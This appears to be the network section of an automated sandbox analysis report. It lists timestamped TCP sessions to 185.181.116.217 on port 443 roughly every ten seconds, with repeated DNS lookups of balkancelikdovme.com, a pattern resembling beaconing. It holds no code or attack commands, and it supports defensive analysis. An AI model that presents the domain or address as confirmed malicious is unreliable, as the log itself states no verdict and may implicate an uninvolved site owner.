                    Sep 4, 2023 16:36:38.920094967 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:38.920277119 CEST49724443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:38.921030045 CEST49724443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:38.921053886 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:38.996309042 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:38.996494055 CEST49724443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:38.998642921 CEST49724443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:38.998681068 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:38.999037981 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:39.013443947 CEST49724443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:39.055496931 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:39.100107908 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:39.100222111 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:39.100378036 CEST49724443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:39.100569963 CEST49724443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:39.100589991 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:39.100667000 CEST49724443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:39.100677013 CEST44349724185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.094491005 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.094557047 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.094686985 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.095381975 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.095402002 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.170907021 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.171154022 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.175647974 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.175676107 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.176098108 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.179944038 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.227489948 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.273698092 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.273791075 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.273855925 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.274490118 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.274518013 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:49.274544001 CEST49725443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:49.274554014 CEST44349725185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:58.919056892 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:58.919183016 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:58.919357061 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:58.920763016 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:58.920818090 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:59.006248951 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:59.006458998 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:59.008656025 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:59.008708000 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:59.009124994 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:59.011214018 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:59.055504084 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:59.104228973 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:59.104376078 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:59.104496002 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:59.104671955 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:59.104692936 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:59.104737997 CEST49726443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:59.104746103 CEST44349726185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:08.973089933 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:08.973181009 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:08.973290920 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:08.981451988 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:08.981503963 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:09.069276094 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:09.069442987 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:09.124574900 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:09.124649048 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:09.125693083 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:09.127633095 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:09.167624950 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:09.167746067 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:09.167855024 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:09.168097019 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:09.168128967 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:09.168149948 CEST49728443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:09.168163061 CEST44349728185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:18.944406033 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:18.944473028 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:18.944572926 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:18.945753098 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:18.945780993 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:19.021478891 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:19.021708012 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:19.024456024 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:19.024513006 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:19.025031090 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:19.027894974 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:19.071489096 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:19.124911070 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:19.125062943 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:19.125175953 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:19.125595093 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:19.125629902 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:19.125658035 CEST49729443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:19.125665903 CEST44349729185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.758311033 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.758384943 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.758604050 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.764564037 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.764616966 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.840807915 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.840971947 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.853423119 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.853470087 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.854151011 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.858129025 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.903487921 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.943675995 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.943820000 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.943926096 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.948921919 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.948973894 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:30.949001074 CEST49730443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:30.949017048 CEST44349730185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:38.918057919 CEST49731443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:38.918093920 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:38.918194056 CEST49731443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:38.919015884 CEST49731443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:38.919039011 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:39.011311054 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:39.011526108 CEST49731443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:39.013426065 CEST49731443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:39.013463020 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:39.013885975 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:39.017822027 CEST49731443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:39.063482046 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:39.113694906 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:39.113941908 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:39.114119053 CEST49731443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:39.114721060 CEST49731443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:39.114753962 CEST44349731185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.755990982 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.756107092 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.756198883 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.757023096 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.757062912 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.838301897 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.838458061 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.841377974 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.841408014 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.841985941 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.844304085 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.887516975 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.940274000 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.940450907 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.940562010 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.940736055 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.940768003 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:49.940790892 CEST49732443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:49.940803051 CEST44349732185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:58.880165100 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:58.880223989 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:58.881864071 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:58.882230997 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:58.882265091 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:58.961858988 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:58.962673903 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:58.965703964 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:58.965754986 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:58.966329098 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:58.969244003 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:59.015490055 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:59.063011885 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:59.063185930 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:59.063353062 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:59.063572884 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:59.063606977 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:37:59.063783884 CEST49733443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:37:59.063806057 CEST44349733185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.558573008 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.558641911 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.558765888 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.560842991 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.560878992 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.642968893 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.643105030 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.645276070 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.645298958 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.645664930 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.647557974 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.691492081 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.743277073 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.743422031 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.743560076 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.743916035 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.743947029 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:09.743968010 CEST49734443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:09.743979931 CEST44349734185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.908998966 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:18.909074068 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.909219980 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:18.911128044 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:18.911159992 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.988639116 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.988872051 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:18.991230011 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:18.991265059 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.991676092 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:18.994399071 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:19.035520077 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:19.090713978 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:19.090831995 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:19.090960026 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:19.091309071 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:19.091341972 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:19.091362000 CEST49735443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:19.091373920 CEST44349735185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.913181067 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.913249969 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.913347960 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.914076090 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.914104939 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.992522955 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.992793083 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.995507002 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:28.995539904 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.995965004 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:28.998897076 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:29.043493032 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:29.094928980 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:29.095053911 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:29.095664024 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:29.096513987 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:29.096560955 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:29.096594095 CEST49736443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:29.096607924 CEST44349736185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.901184082 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.901232958 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.901341915 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.902555943 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.902578115 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.981415987 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.981535912 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.983365059 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:38.983382940 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.983933926 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:38.986653090 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:39.027479887 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:39.083014011 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:39.083121061 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:39.083251953 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:39.083800077 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:39.083800077 CEST49737443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:39.083827019 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:39.083859921 CEST44349737185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.876991987 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.877083063 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.877172947 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.877863884 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.877899885 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.953335047 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.953469038 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.955735922 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:48.955749989 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.956059933 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:48.958384037 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:49.003474951 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:49.056870937 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:49.056967020 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:49.057101965 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:49.057332993 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:49.057370901 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:49.057390928 CEST49738443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:49.057404041 CEST44349738185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:58.955584049 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:58.955657005 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:58.955804110 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:58.959841013 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:58.959886074 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.043687105 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.043889046 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.080552101 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.080621958 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.081142902 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.120940924 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.282408953 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.316441059 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.316577911 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.316648006 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.317368984 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.317388058 CEST44349739185.181.116.217192.168.2.4
                    Sep 4, 2023 16:38:59.317404985 CEST49739443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:38:59.317413092 CEST44349739185.181.116.217192.168.2.4

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 4, 2023 16:36:09.132842064 CEST6083853192.168.2.48.8.8.8
                    Sep 4, 2023 16:36:09.147981882 CEST53608388.8.8.8192.168.2.4
                    Sep 4, 2023 16:36:18.938189030 CEST5181653192.168.2.48.8.8.8
                    Sep 4, 2023 16:36:18.985531092 CEST53518168.8.8.8192.168.2.4
                    Sep 4, 2023 16:36:28.902761936 CEST6255053192.168.2.48.8.8.8
                    Sep 4, 2023 16:36:28.931853056 CEST53625508.8.8.8192.168.2.4
                    Sep 4, 2023 16:36:38.878403902 CEST5330053192.168.2.48.8.8.8
                    Sep 4, 2023 16:36:38.917459011 CEST53533008.8.8.8192.168.2.4
                    Sep 4, 2023 16:36:49.034348011 CEST6480353192.168.2.48.8.8.8
                    Sep 4, 2023 16:36:49.082881927 CEST53648038.8.8.8192.168.2.4
                    Sep 4, 2023 16:36:58.886195898 CEST6482953192.168.2.48.8.8.8
                    Sep 4, 2023 16:36:58.915710926 CEST53648298.8.8.8192.168.2.4
                    Sep 4, 2023 16:37:08.939090014 CEST5845853192.168.2.48.8.8.8
                    Sep 4, 2023 16:37:08.968136072 CEST53584588.8.8.8192.168.2.4
                    Sep 4, 2023 16:37:18.895230055 CEST6452253192.168.2.48.8.8.8
                    Sep 4, 2023 16:37:18.942511082 CEST53645228.8.8.8192.168.2.4
                    Sep 4, 2023 16:37:30.710581064 CEST5365353192.168.2.48.8.8.8
                    Sep 4, 2023 16:37:30.731101990 CEST53536538.8.8.8192.168.2.4
                    Sep 4, 2023 16:37:38.892713070 CEST5208653192.168.2.48.8.8.8
                    Sep 4, 2023 16:37:38.916171074 CEST53520868.8.8.8192.168.2.4
                    Sep 4, 2023 16:37:49.732264042 CEST6419653192.168.2.48.8.8.8
                    Sep 4, 2023 16:37:49.753021955 CEST53641968.8.8.8192.168.2.4
                    Sep 4, 2023 16:37:58.862595081 CEST5486353192.168.2.48.8.8.8
                    Sep 4, 2023 16:37:58.877693892 CEST53548638.8.8.8192.168.2.4
                    Sep 4, 2023 16:38:09.501190901 CEST5539853192.168.2.48.8.8.8
                    Sep 4, 2023 16:38:09.548331976 CEST53553988.8.8.8192.168.2.4
                    Sep 4, 2023 16:38:18.877739906 CEST5443253192.168.2.48.8.8.8
                    Sep 4, 2023 16:38:18.906862974 CEST53544328.8.8.8192.168.2.4
                    Sep 4, 2023 16:38:28.891261101 CEST4998553192.168.2.48.8.8.8
                    Sep 4, 2023 16:38:28.911595106 CEST53499858.8.8.8192.168.2.4
                    Sep 4, 2023 16:38:38.870651007 CEST5127353192.168.2.48.8.8.8
                    Sep 4, 2023 16:38:38.899369001 CEST53512738.8.8.8192.168.2.4
                    Sep 4, 2023 16:38:48.845858097 CEST6133053192.168.2.48.8.8.8
                    Sep 4, 2023 16:38:48.875427961 CEST53613308.8.8.8192.168.2.4
                    Sep 4, 2023 16:38:58.924144030 CEST6092653192.168.2.48.8.8.8
                    Sep 4, 2023 16:38:58.947972059 CEST53609268.8.8.8192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Sep 4, 2023 16:36:09.132842064 CEST192.168.2.48.8.8.80x7289Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:18.938189030 CEST192.168.2.48.8.8.80x591aStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:28.902761936 CEST192.168.2.48.8.8.80x3332Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:38.878403902 CEST192.168.2.48.8.8.80xc500Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:49.034348011 CEST192.168.2.48.8.8.80xc38bStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:36:58.886195898 CEST192.168.2.48.8.8.80xc3dbStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:08.939090014 CEST192.168.2.48.8.8.80x70aeStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:18.895230055 CEST192.168.2.48.8.8.80x50f3Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:30.710581064 CEST192.168.2.48.8.8.80x15b9Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:38.892713070 CEST192.168.2.48.8.8.80xca3dStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:49.732264042 CEST192.168.2.48.8.8.80x917aStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:37:58.862595081 CEST192.168.2.48.8.8.80xebfbStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:09.501190901 CEST192.168.2.48.8.8.80xe282Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:18.877739906 CEST192.168.2.48.8.8.80x5705Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:28.891261101 CEST192.168.2.48.8.8.80x95c6Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:38.870651007 CEST192.168.2.48.8.8.80x4561Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                    Sep 4, 2023 16:38:48.845858097 CEST192.168.2.48.8.8.80xbc6aStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
